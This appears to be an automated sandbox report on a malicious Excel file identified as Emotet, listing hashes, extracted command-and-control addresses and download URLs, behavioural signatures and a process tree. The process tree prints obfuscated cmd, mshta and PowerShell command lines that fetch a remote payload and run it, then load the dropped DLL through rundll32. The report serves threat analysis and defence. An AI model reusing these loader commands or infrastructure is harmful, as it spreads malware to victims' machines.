Analysis
-
max time kernel
122s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
18-01-2022 12:04
Behavioral task
behavioral1
Sample
9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f.xls
Resource
win10-en-20211208
General
-
Target
9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f.xls
-
Size
128KB
-
MD5
d53904bac924c9d2dd304ca3fe736d74
-
SHA1
ec526f926bd2b3a51062139bc9730f80729d09f1
-
SHA256
9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f
-
SHA512
80c737de3f932e64221067a49f2f1c2907fdcb1566304f68b1d2cf29abdd5b19ee87dca13d6832d7e00683126f147e457af974d815d9c3131112d5c363d4c988
Malware Config
Extracted
http://0xb907d607/cc.html
Extracted
http://185.7.214.7/PP91.PNG
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2644 2472 cmd.exe 67 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid Process 26 1856 mshta.exe 35 3864 powershell.exe 37 3864 powershell.exe 39 3864 powershell.exe 47 4032 rundll32.exe 48 4032 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid Process 1080 rundll32.exe 1396 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\Oqleddczjvxrjlai\hxtjh.qmi rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 2808 1856 WerFault.exe 74 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2472 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid Process 3864 powershell.exe 3864 powershell.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 3864 powershell.exe 4032 rundll32.exe 4032 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid Process Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 2808 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid Process 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE 2472 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid Process procid_target PID 2472 wrote to memory of 2644 2472 EXCEL.EXE 71 PID 2472 wrote to memory of 2644 2472 EXCEL.EXE 71 PID 2644 wrote to memory of 1856 2644 cmd.exe 74 PID 2644 wrote to memory of 1856 2644 cmd.exe 74 PID 1856 wrote to memory of 3864 1856 mshta.exe 76 PID 1856 wrote to memory of 3864 1856 mshta.exe 76 PID 3864 wrote to memory of 3040 3864 powershell.exe 79 PID 3864 wrote to memory of 3040 3864 powershell.exe 79 PID 3040 wrote to memory of 1080 3040 cmd.exe 80 PID 3040 wrote to memory of 1080 3040 cmd.exe 80 PID 3040 wrote to memory of 1080 3040 cmd.exe 80 PID 1080 wrote to memory of 1396 1080 rundll32.exe 81 PID 1080 wrote to memory of 1396 1080 rundll32.exe 81 PID 1080 wrote to memory of 1396 1080 rundll32.exe 81 PID 1396 wrote to memory of 1308 1396 rundll32.exe 82 PID 1396 wrote to memory of 1308 1396 rundll32.exe 82 PID 1396 wrote to memory of 1308 1396 rundll32.exe 82 PID 1308 wrote to memory of 4032 1308 rundll32.exe 83 PID 1308 wrote to memory of 4032 1308 rundll32.exe 83 PID 1308 wrote to memory of 4032 1308 rundll32.exe 83
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/cc.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oqleddczjvxrjlai\hxtjh.qmi",trNEzrVq8⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oqleddczjvxrjlai\hxtjh.qmi",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4032
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1856 -s 16684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e5fcf505c25e66116f288a8ae28d2c8a
SHA1e597f6439a01aad82e153e0de647f54ad82b58d3
SHA25663996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9
SHA512ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1
-
MD5
e5fcf505c25e66116f288a8ae28d2c8a
SHA1e597f6439a01aad82e153e0de647f54ad82b58d3
SHA25663996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9
SHA512ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1
-
MD5
e5fcf505c25e66116f288a8ae28d2c8a
SHA1e597f6439a01aad82e153e0de647f54ad82b58d3
SHA25663996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9
SHA512ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1